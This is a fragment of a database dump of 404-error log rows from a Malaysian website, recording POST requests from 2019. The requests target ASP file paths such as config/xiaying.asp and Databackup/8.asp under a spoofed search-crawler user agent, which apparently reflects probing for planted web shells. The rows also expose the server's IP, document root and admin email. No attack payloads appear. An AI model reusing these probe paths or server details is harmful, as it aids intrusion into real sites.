02:44:13',35340336,37143992,'http://bintara.com.my//upload/test12.cer',1,0,'123.149.238.28'),(28742,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//admin/grefew.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.131.209.77\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.131.209.77\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/grefew.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/admin/grefew.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@@Ye4vBmywCERyagfmdQAAARM\";s:12:\"REDIRECT_URL\";s:17:\"/admin/grefew.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"60836\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/admin/grefew.asp\";s:10:\"SCRIPT_URL\";s:17:\"/admin/grefew.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@@Ye4vBmywCERyagfmdQAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798626.0908\";s:12:\"REQUEST_TIME\";s:10:\"1571798626\";}}','notice','2019-10-23 02:43:48','2019-10-23 02:43:46',35272240,37071376,'http://bintara.com.my//admin/grefew.asp',1,0,'202.131.209.77'),(28741,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//config/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"219.243.254.131\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"219.243.254.131\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/config/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/config/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@@A@4vBmywCERyagfmXAAAARI\";s:12:\"REDIRECT_URL\";s:19:\"/config/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"58565\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/config/xiaying.asp\";s:10:\"SCRIPT_URL\";s:19:\"/config/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@@A@4vBmywCERyagfmXAAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798531.5418\";s:12:\"REQUEST_TIME\";s:10:\"1571798531\";}}','notice','2019-10-23 02:42:20','2019-10-23 02:42:11',35661800,37466032,'http://bintara.com.my//config/xiaying.asp',1,0,'219.243.254.131'),(28740,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//member/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.0.110.220\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.0.110.220\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/member/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/member/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9x@HARMCuuKQiJT-zGwAAAMw\";s:12:\"REDIRECT_URL\";s:19:\"/member/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62410\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/member/xiaying.asp\";s:10:\"SCRIPT_URL\";s:19:\"/member/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9x@HARMCuuKQiJT-zGwAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798472.1624\";s:12:\"REQUEST_TIME\";s:10:\"1571798472\";}}','notice','2019-10-23 02:41:15','2019-10-23 02:41:12',35341584,37147024,'http://bintara.com.my//member/xiaying.asp',1,0,'202.0.110.220'),(28739,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//Databackup/8.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"117.75.0.90\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"117.75.0.90\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/Databackup/8.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/Databackup/8.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9qa6CYj3S7An3VFFcTQAAAU4\";s:12:\"REDIRECT_URL\";s:17:\"/Databackup/8.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63408\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/Databackup/8.asp\";s:10:\"SCRIPT_URL\";s:17:\"/Databackup/8.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9qa6CYj3S7An3VFFcTQAAAU4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571798441.59\";s:12:\"REQUEST_TIME\";s:10:\"1571798441\";}}','notice','2019-10-23 02:40:44','2019-10-23 02:40:42',35343008,37139496,'http://bintara.com.my//Databackup/8.asp',1,0,'117.75.0.90'),(28738,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//cem/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.237.73.156\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.237.73.156\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/cem/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/cem/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9eK6CYj3S7An3VFFcPAAAAVg\";s:12:\"REDIRECT_URL\";s:14:\"/cem/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63870\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/cem/index.asp\";s:10:\"SCRIPT_URL\";s:14:\"/cem/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9eK6CYj3S7An3VFFcPAAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798392.2846\";s:12:\"REQUEST_TIME\";s:10:\"1571798392\";}}','notice','2019-10-23 02:39:55','2019-10-23 02:39:52',35269520,37072088,'http://bintara.com.my//cem/index.asp',1,0,'61.237.73.156'),(28737,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//cem/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"60.216.23.215\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"60.216.23.215\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/cem/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/cem/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9byGcwml6EYyVWZHQ6wAAAIA\";s:12:\"REDIRECT_URL\";s:14:\"/cem/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63387\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/cem/index.asp\";s:10:\"SCRIPT_URL\";s:14:\"/cem/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9byGcwml6EYyVWZHQ6wAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798384.0803\";s:12:\"REQUEST_TIME\";s:10:\"1571798384\";}}','notice','2019-10-23 02:39:47','2019-10-23 02:39:44',35343088,37144328,'http://bintara.com.my//cem/index.asp',1,0,'60.216.23.215'),(28736,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//eng/inc/md5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.112.69.163\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.112.69.163\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/eng/inc/md5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/eng/inc/md5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9ZyGcwml6EYyVWZHQ6gAAAI0\";s:12:\"REDIRECT_URL\";s:16:\"/eng/inc/md5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63387\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/eng/inc/md5.asp\";s:10:\"SCRIPT_URL\";s:16:\"/eng/inc/md5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9ZyGcwml6EYyVWZHQ6gAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798375.3893\";s:12:\"REQUEST_TIME\";s:10:\"1571798375\";}}','notice','2019-10-23 02:39:37','2019-10-23 02:39:35',35268568,37070024,'http://bintara.com.my//eng/inc/md5.asp',1,0,'220.112.69.163'),(28735,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//eng/inc/md5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"218.244.215.183\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"218.244.215.183\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/eng/inc/md5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/eng/inc/md5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9YO4vBmywCERyagfmPgAAAQM\";s:12:\"REDIRECT_URL\";s:16:\"/eng/inc/md5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63136\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/eng/inc/md5.asp\";s:10:\"SCRIPT_URL\";s:16:\"/eng/inc/md5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9YO4vBmywCERyagfmPgAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571798368.906\";s:12:\"REQUEST_TIME\";s:10:\"1571798368\";}}','notice','2019-10-23 02:39:33','2019-10-23 02:39:29',35342640,37137440,'http://bintara.com.my//eng/inc/md5.asp',1,0,'218.244.215.183'),(28734,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//Templates/red.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"61.150.4.48\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"61.150.4.48\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/Templates/red.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/Templates/red.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@9Uu4vBmywCERyagfmPAAAAQA\";s:12:\"REDIRECT_URL\";s:18:\"/Templates/red.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.166\";s:11:\"REMOTE_PORT\";s:5:\"53623\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/Templates/red.asp\";s:10:\"SCRIPT_URL\";s:18:\"/Templates/red.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@9Uu4vBmywCERyagfmPAAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798354.6218\";s:12:\"REQUEST_TIME\";s:10:\"1571798354\";}}','notice','2019-10-23 02:39:17','2019-10-23 02:39:15',35269424,37078936,'http://bintara.com.my//Templates/red.asp',1,0,'61.150.4.48'),(28733,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//Templates/red.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 